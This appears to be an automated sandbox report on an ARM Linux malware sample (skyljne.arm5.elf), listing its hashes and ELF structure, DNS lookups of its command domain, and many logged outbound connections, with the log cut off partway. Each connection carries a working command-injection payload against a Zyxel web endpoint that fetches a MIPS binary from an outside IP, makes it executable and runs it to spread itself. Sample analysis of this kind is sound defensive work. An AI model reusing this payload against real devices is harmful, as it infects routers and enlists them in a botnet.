                                                Entropy (8bit):5.680720322991588
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:skyljne.arm5.elf
                                                File size:149'408 bytes
                                                MD5:3e4f991a16e5c2859944311aa34a93c0
                                                SHA1:628feb2555e6fe2ceb85676fb21ece2133de4161
                                                SHA256:6fc3c3b2019f7b45b78e623adc872986817da0427d273a9bb04c0c44ed8befc6
                                                SHA512:3d0ce30255038ede30cb34b9e29cb494a5cab38c4c240818afbde8284db380161bd9d6aee125d593646bc2825e662ce6ef0bd7c148740ba1e1d1d09c29749ec0
                                                SSDEEP:3072:38cb9ryx7kkNS1Us4m4zpOwYf/6nX3R0BIs:386kk/2s4mqpOwhnnR0L
                                                TLSH:17E31945FC504E23C6D312BBFB5E028D372A17A8D3EE720399256F65378A95B0E37642
                                                File Content Preview:.ELF...a..........(.........4....F......4. ...(.....................L...L...............P...P...P....Q..............Q.td..................................-...L."...um..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:ARM
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:ARM - ABI
                                                ABI Version:0
                                                Entry Point Address:0x8190
                                                Flags:0x2
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:149008
                                                Section Header Size:40
                                                Number of Section Headers:10
                                                Header String Table Index:9
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x80940x940x180x00x6AX004
                                                .textPROGBITS0x80b00xb00x1b60c0x00x6AX0016
                                                .finiPROGBITS0x236bc0x1b6bc0x140x00x6AX004
                                                .rodataPROGBITS0x236d00x1b6d00x3d7c0x00x2A004
                                                .ctorsPROGBITS0x2f4500x1f4500xc0x00x3WA004
                                                .dtorsPROGBITS0x2f45c0x1f45c0x80x00x3WA004
                                                .dataPROGBITS0x2f4800x1f4800x51500x00x3WA0032
                                                .bssNOBITS0x345d00x245d00x46180x00x3WA004
                                                .shstrtabSTRTAB0x00x245d00x3e0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80000x80000x1f44c0x1f44c6.14260x5R E0x8000.init .text .fini .rodata
                                                LOAD0x1f4500x2f4500x2f4500x51800x97981.06420x6RW 0x8000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 12, 2024 18:15:41.875524044 CET192.168.2.238.8.8.80x1c44Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:15:49.731210947 CET192.168.2.238.8.8.80xc946Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:15:58.549256086 CET192.168.2.238.8.8.80x8a8dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:05.402326107 CET192.168.2.238.8.8.80xfb55Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:09.278107882 CET192.168.2.238.8.8.80xe968Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:20.139547110 CET192.168.2.238.8.8.80xdc90Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:29.005745888 CET192.168.2.238.8.8.80x6ecbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:30.835808039 CET192.168.2.238.8.8.80x78beStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:38.672736883 CET192.168.2.238.8.8.80x21bbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:43.512891054 CET192.168.2.238.8.8.80x3a86Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:54.379538059 CET192.168.2.238.8.8.80xee72Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:57.237941980 CET192.168.2.238.8.8.80xb37fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:06.084532976 CET192.168.2.238.8.8.80xaab7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:07.917555094 CET192.168.2.238.8.8.80x218fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:11.776441097 CET192.168.2.238.8.8.80xf498Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:21.642224073 CET192.168.2.238.8.8.80x8f02Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:28.471826077 CET192.168.2.238.8.8.80x946dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:39.380389929 CET192.168.2.238.8.8.80x4f5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:44.385018110 CET192.168.2.238.8.8.80x4f5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 12, 2024 18:15:41.995790005 CET8.8.8.8192.168.2.230x1c44No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:15:49.831651926 CET8.8.8.8192.168.2.230xc946No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:15:58.670021057 CET8.8.8.8192.168.2.230x8a8dNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:05.509936094 CET8.8.8.8192.168.2.230xfb55No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:09.380625963 CET8.8.8.8192.168.2.230xe968No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:20.257175922 CET8.8.8.8192.168.2.230xdc90No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:29.106262922 CET8.8.8.8192.168.2.230x6ecbNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:30.943150043 CET8.8.8.8192.168.2.230x78beNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:38.786942005 CET8.8.8.8192.168.2.230x21bbNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:43.613492966 CET8.8.8.8192.168.2.230x3a86No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:54.480500937 CET8.8.8.8192.168.2.230xee72No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:16:57.341743946 CET8.8.8.8192.168.2.230xb37fNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:06.188004017 CET8.8.8.8192.168.2.230xaab7No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:08.024931908 CET8.8.8.8192.168.2.230x218fNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:11.892376900 CET8.8.8.8192.168.2.230xf498No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:21.742341042 CET8.8.8.8192.168.2.230x8f02No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:17:28.588509083 CET8.8.8.8192.168.2.230x946dNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.235182291.147.188.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920181990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.233783079.161.82.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920355082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.2340684122.251.37.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920397997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.2357836219.57.133.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920495987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.235073280.121.15.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920558929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.2351370203.24.63.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920630932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.2342284195.230.248.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920741081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.2350256137.96.192.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920767069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.235205489.94.200.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920825958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.2337796217.45.255.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920927048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.2356194164.192.218.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.920969963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.2352924157.132.60.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921030998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.2346766212.74.236.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921082973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.2342820199.11.218.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921150923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.2339414180.174.47.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921209097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.235895858.211.71.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921274900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.2342406150.172.186.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921327114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.2346156106.186.239.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921399117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.2335728213.139.141.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921432972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.233483087.207.107.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921514988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.2360658149.60.214.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921566963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.2359386187.111.95.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921636105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.235282817.250.28.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921725035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.235306053.220.233.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921799898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.234088682.216.61.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921857119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.2344206116.115.28.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921926975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.2346080156.72.233.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.921973944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.235850478.99.14.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922041893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.2348170143.133.19.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922127008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.2340112117.1.207.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922167063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.233691850.35.49.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922244072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.2343462151.188.60.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922314882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.235590480.7.209.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922396898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.2341184125.1.1.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922472000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.233445299.227.121.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922568083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.2340562173.166.122.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922631025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.234517436.159.19.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922637939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.2355178102.13.72.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922700882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.233696044.184.166.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922775984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.233824414.63.243.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922871113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.2346424162.152.1.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922883034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.235794297.131.156.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.922947884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.233279270.181.95.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923011065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.2356050144.198.186.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923095942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.235173468.188.167.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923130035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.2359748201.119.55.241443
                                                TimestampBytes transferredDirectionData
